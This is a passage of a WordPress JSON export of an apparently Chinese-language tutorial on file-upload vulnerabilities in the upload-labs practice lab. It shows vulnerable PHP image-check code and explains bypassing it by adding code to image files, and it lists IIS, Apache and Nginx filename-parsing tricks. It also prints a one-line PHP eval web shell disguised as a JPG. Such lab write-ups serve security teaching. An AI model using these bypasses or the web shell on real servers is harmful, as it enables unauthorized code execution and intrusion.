$is_upload = true;\n } else {\n $msg = "\u4e0a\u4f20\u51fa\u9519\uff01";\n }\n }\n}<\/code><\/pre>\ngetimagesize\u8fd9\u4e2a\u51fd\u6570\u529f\u80fd\u4f1a\u5bf9\u76ee\u6807\u6587\u4ef6\u768416\u8fdb\u5236\u53bb\u8fdb\u884c\u4e00\u4e2a\u8bfb\u53d6\uff0c\u53bb\u8bfb\u53d6\u5934\u51e0\u4e2a\u5b57\u7b26\u4e32\u662f\u4e0d\u662f\u7b26\u5408\u56fe\u7247\u7684\u8981\u6c42\u7684\uff0c\u4e0a\u4f20\u56fe\u7247\u9a6c\uff0c\u5199\u5165\u4ee3\u7801\u5230\u56fe\u7247\uff0c\u4f7f\u7528\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\uff0c\u8bbf\u95ee\u8be5\u56fe\u7247\u5730\u5740\u5373\u53ef<\/p>\n
\u7a81\u7834exif_imagetype\u7ed5\u8fc7-upload-labs-15<\/strong><\/h6>\nfunction isImage($filename){\n $types = '.jpeg|.png|.gif';\n if(file_exists($filename)){\n $info = getimagesize($filename);\n $ext = image_type_to_extension($info[2]);\n if(stripos($types,$ext)>=0){\n return $ext;\n }else{\n return false;\n }\n }else{\n return false;\n }\n}\n\n$is_upload = false;\n$msg = null;\nif(isset($_POST['submit'])){\n $temp_file = $_FILES['upload_file']['tmp_name'];\n $res = isImage($temp_file);\n if(!$res){\n $msg = "\u6587\u4ef6\u672a\u77e5\uff0c\u4e0a\u4f20\u5931\u8d25\uff01";\n }else{\n $img_path = UPLOAD_PATH."\/".rand(10, 99).date("YmdHis").$res;\n if(move_uploaded_file($temp_file,$img_path)){\n $is_upload = true;\n } else {\n $msg = "\u4e0a\u4f20\u51fa\u9519\uff01";\n }\n }\n}<\/code><\/pre>\nexif_imagetype() \u8bfb\u53d6\u4e00\u4e2a\u56fe\u50cf\u7684\u7b2c\u4e00\u4e2a\u5b57\u8282\u5e76\u68c0\u67e5\u5176\u7b7e\u540d\u3002\u5982\u679c\u53d1\u73b0\u4e86\u6070\u5f53\u7684\u7b7e\u540d\u5219\u8fd4\u56de\u4e00\u4e2a\u5bf9\u5e94\u7684\u5e38\u91cf\uff0c\u5426\u5219\u8fd4\u56de FALSE\u3002\u8fd4\u56de\u503c\u8ddfgetimagesize() \u8fd4\u56de\u7684\u6570\u7ec4\u4e2d\u7684\u7d22\u5f15 2 \u7684\u503c\u662f\u4e00\u6837\u7684\uff0c\u4f46exif_imagetype\u51fd\u6570\u5feb\u5f97\u591a\uff0c\u540cgetimagesize\u51fd\u6570\u4e00\u6837\uff0c\u4e5f\u662f\u4fee\u6539\u6587\u4ef6\u5934\u4fe1\u606f\uff0c\u914d\u5408\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u4e0a\u4f20<\/p>\n
\u670d\u52a1\u5668\u89e3\u6790\u6f0f\u6d1e<\/h5>\nIIS 5.x\/6.0\u89e3\u6790\u6f0f\u6d1e<\/h6>\n
IIS5.x-6.x:
\n1\u3001\u76ee\u5f55\u89e3\u6790(6.0):\/1.asp\/1.jpg<\/code> \u5728\u6b64\u76ee\u5f55\u4e0b\u7684\u4efb\u610f\u6587\u4ef6\uff0c\u670d\u52a1\u5668\u90fd\u89e3\u6790\u4e3aasp\u6587\u4ef6
\n2\u3001\u6587\u4ef6\u89e3\u6790:1.asp;.jpg<\/code>
\n3\u3001\u6587\u4ef6\u7c7b\u578b:1.asa,a.cer,1.cdx<\/code><\/p>\nIIS7.5\uff1a
\nIIS7.5\u662f\u7531\u4e8ephp\u914d\u7f6e\u6587\u4ef6\u4e2d\uff0c\u5f00\u542f\u4e86cgi.fix_pathinf<\/p>\n
Apache\u89e3\u6790\u6f0f\u6d1e<\/h6>\n
Apache:
\n\u4ece\u53f3\u5230\u5de6\u5f00\u59cb\u5224\u65ad\u89e3\u6790,\u5982\u679c\u540e\u7f00\u540d\u4e3a\u4e0d\u53ef\u8bc6\u522b\u6587\u4ef6\u89e3\u6790,\u5c31\u518d\u5f80\u5de6\u5224\u65ad
\n\u540e\u7f00\u4e0d\u8bc6\u522b\uff1a1.php.php123
\n\u914d\u7f6e\u9519\u8bef\uff1a1.php.jpg<\/p>\n
Nginx\u89e3\u6790\u6f0f\u6d1e<\/h6>\n
Nginx\uff1a
\nNginx\u9ed8\u8ba4\u662f\u4ee5CGI\u7684\u65b9\u5f0f\u652f\u6301PHP\u89e3\u6790\u7684\uff0c\u548cIIS7.5\u4e00\u6837\u5f00\u542f\u4e86cgi.fix_pathinf
\n1.jpg\/1.php
\n1.jpg%00.php
\n1.jpg\/%20\\1.php
\n\u4e0a\u4f20\u4e00\u4e2a\u540d\u5b57\u4e3atest.jpg\uff0c\u4ee5\u4e0b\u5185\u5bb9\u7684\u6587\u4ef6
\n<?php @eval($_REQUEST['cmd']);?>
\n\u7136\u540e\u8bbf\u95eetest.jpg\/.php,\u5728\u8fd9\u4e2a\u76ee\u5f55\u4e0b\u5c31\u4f1a\u751f\u6210\u4e00\u53e5\u8bdd\u6728\u9a6cshell.php<\/p>\n","protected":false},"excerpt":{"rendered":"
\u7b80\u5355\u4ecb\u7ecd \u539f\u7406\uff1a \u7531\u4e8e\u7a0b\u5e8f\u5458\u5728\u7f16\u5199\u4ee3\u7801\u65f6\u5019\u5728\u5bf9\u7528\u6237\u6587\u4ef6\u4e0a\u4f20\u529f\u80fd\u5b9e\u73b0\u4ee3\u7801\u4e0a\u6ca1\u6709\u4e25\u683c\u9650\u5236\u7528\u6237\u4e0a\u4f20\u7684\u6587\u4ef6\u540e\u7f00\u4ee5\u53ca\u6587\u4ef6\u7c7b\u578b\u6216\u8005\u5904\u7406\u7f3a\u9677,\u800c …<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-105","post","type-post","status-publish","format-standard","hentry","category-3"],"_links":{"self":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/105","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=105"}],"version-history":[{"count":3,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/105\/revisions"}],"predecessor-version":[{"id":243,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/105\/revisions\/243"}],"wp:attachment":[{"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=105"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=105"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=105"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"upload-labs\"](\"http:\/\/img.danielw.top\/upload-labs-16492282405819.png\")
<\/p>\n![\"image-20220325153628067\"](\"http:\/\/img.danielw.top\/image-20220325153628067-164922824058911.png\")
<\/p>\n![\"image-20220325154759367\"](\"http:\/\/img.danielw.top\/image-20220325154759367-164922824058913.png\")
<\/p>\n![\"image-20220325155125472\"](\"http:\/\/img.danielw.top\/image-20220325155125472-164922824058915.png\")
<\/p>\n![\"image-20220325172015125\"](\"http:\/\/img.danielw.top\/image-20220325172015125-164922824059017.png\")
<\/p>\n